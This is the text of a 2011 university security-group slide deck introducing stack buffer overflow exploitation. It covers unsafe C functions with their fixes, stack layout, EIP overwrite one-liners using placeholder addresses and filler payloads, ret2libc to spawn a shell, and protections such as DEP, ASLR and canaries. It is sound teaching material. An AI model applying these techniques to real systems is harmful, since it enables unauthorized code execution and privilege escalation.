Intro to Exploitation Stack Overflows James McFadyen UTD Computer Security Group 10/20/2011 Intro to Exploitation Only an intro to stack overflow Basic theory and application One of many types of exploitation Outline What is a buffer overflow? Tools Vulnerable C Functions Remember the memory Learn to love assembly Stack overflow Protection Mechanisms ret2libc in Linux Buffer Overflow “In computer security and programming, a buffer overflow, or buffer overrun, is an anomaly where a program, while writing data to a buffer, overruns the buffer's boundary and overwrites adjacent memory. This is a special case of violation of memory safety.” Wikipedia Buffer Overflow In our examples.. Give the program too much input, hijack the instruction pointer (EIP) Control EIP Execute arbitrary code locally or remotely Achieve what we want as elevated user Tools Linux GDB, gcc, vi, perl/python/ruby, readelf, objdump, ltrace, strace, ropeme Windows WinDBG, OllyDBG, ImmunityDBG, IDA, Python, Mona (ImmunityDBG plugin) Vulnerable C Code strcpy(), strncpy() strcat(), strncat() sprintf(), snprintf() gets() sscanf() Many others... Vulnerable C Code strcpy() doesn't check size If we have char buf[128]; strcpy(buf, userSuppliedString); This makes it too easy... Vulnerable C Code char *strncpy(char *dest, const char *src, size_t n); We have a size, but what if.. strncpy(somebuffer, str, strlen(str)); or.. strncpy(somebuffer, str, sizeof(somebuffer)); Where str is supplied by user Vulnerable C Code Common bug, proper fix: strncpy(somebuffer, str, sizeof(somebuffer)-1); Vulnerable C Code char *strncat(char *dest, const char *src, size_t n); Ex: int vulnerable(char *str1, char *str2) { char buf[256]; strncpy(buf, str1, 100); strncat(buf, str2, sizeof(buf)-1); return; } Vulnerable C Code Fix: strncat(buf, str2, sizeof(buf) - strlen(buf) -1); Remember the Memory Low Text Data BSS Heap Stack High Code segment, machine instr. Initialized global and static variables Uninitialized global and static variables Dynamic space. malloc(...) / free(...) new(...) / ~ Program scratch space. Local variables, pass arguments, etc.. * Taken from Mitchell Adair's “Stack Overflows” Remember the Memory: The Stack Low ESP local variables ... EBP EBP - x EBP RET arguments... previous stack frame EBP + x High * Taken from Mitchell Adair's “Stack Overflows” Love the Assembly EIP – Extended Instruction Pointer ESP – Extended Stack Pointer EBP – Extended Base Pointer Next Instruction executed Top of stack Base Pointer EAX Accumulator register EBX Base register ECX Counter register EDX Data register ESI Source index EDI Destination Index * Taken from Mitchell Adair's “Stack Overflows” Stack Overflow ESP char buf[100] 100 bytes EBP EBP RET 4 bytes 4 bytes argc *argv[] * Taken from Mitchell Adair's “Stack Overflows” Stack Overflow ESP Ex: $ ./program $(python -c 'print "A" * 108 ') 108 bytes ( 0x41 * 108) Ret will pop the instruction pointer off of the stack EIP will now point to 0x41414141 100 bytes EBP RET EBP RET overwritten RET argc *argv[] 4 bytes 4 bytes * Taken from Mitchell Adair's “Stack Overflows” Stack Overflow Ex: $ ./program $(python -c 'print "A" * 104 + “\xef\xbe\xad\xde” ') ESP 104 bytes ( 0x41 * 104 EIP will now point to 0xdeadbeef We can now point EIP where we want 100 bytes EBP RET EBP 0xdeadbeef RET 4 bytes 4 bytes argc *argv[] * Taken from Mitchell Adair's “Stack Overflows” Stack Overflow $ ./program $(python -c 'print "A" * 104 + “\xef\xbe\xad\xde” ') We have 104 bytes for a payload Payload can be anything, but for our purpose we would spawn a shell The payload will be fixed size, so when we insert it, we must reduce the # of A's by the size of the payload Stack Overflow $ ./program $(python -c 'print "A" * 104 + “\xef\xbe\xad\xde” ') If we had a 32 byte payload .. (real payload will not be a bunch of \xff) $ ./program $(python -c 'print "A" * 72 + “\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x ff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff” + “\xef\xbe\xad\xde” ') We have adjusted the buffer so the payload will fit We will then have to point EIP (\xef\xbe\xad\xde) to our payload on the stack Stack Overflow $ ./program $(python -c 'print "A" * 72 + “\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x ff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff” + “\xef\xbe\xad\xde” ') “\xef\xbe\xad\xde” would be replaced with the address of our payload EIP will now point to the address of our payload, which will spawn a shell NOPs help create a bigger “landing area” This technique is not very effective anymore... why? Protection Mechanisms (Windows) DEP – Data execution Prevention /GS Flag – cookie / canary detects if stack has been altered SafeSEH – Structured Exception Handler Can't execute on the stack Try / except, catches exceptions ASLR - Address Space Layout Randomization Randomizes addresses in memory Protection Mechanisms (Linux) NX – Stack Execute Invalidation Processor feature Like DEP, can't execute on the stack Stack Smashing Protection – cookie / canary Generally enabled by default ASLR - Address Space Layout Randomization Many other compiler protections... ret2libc Bypasses NX Point EIP to a function in libc system(), exec() etc... system(“/bin/sh”); We will get a shell by using the system() function in libc ret2libc $ ./program $(python -c 'print "A" * 104 + “\xef\xbe\xad\xde” ') We don't need the payload where the A's are anymore We now will point EIP to the address of system(), then the next 4 bytes will be a return address, followed by system() arguments (which will be /bin/sh) $ ./program $(python -c 'print "A" * 104 + address_of_system + return_address + payload ') Demo! How to use GDB for exploitation Exploring the stack Finding important memory addresses (ret2libc) Breakpoints Using Perl/Python/Ruby for arguments in GDB Basic Stack Overflow Ret2libc Additional Resources https://www.corelan.be/index.php/articles/ http://beej.us/guide/bggdb/ http://en.wikibooks.org/wiki/X86_Assembly http://www.alexonlinux.com/how-debuggerworks http://smashthestack.org/ http://intruded.net/ Sources “Source Code Auditing” - Jared Demott “Smashing the stack in 2010” - Andrea Cugliari + Mariano Graziano “Stack Overflows” - Mitchell Adair http://en.wikipedia.org/wiki/Buffer_overflow http://en.wikipedia.org/wiki/Return-tolibc_attack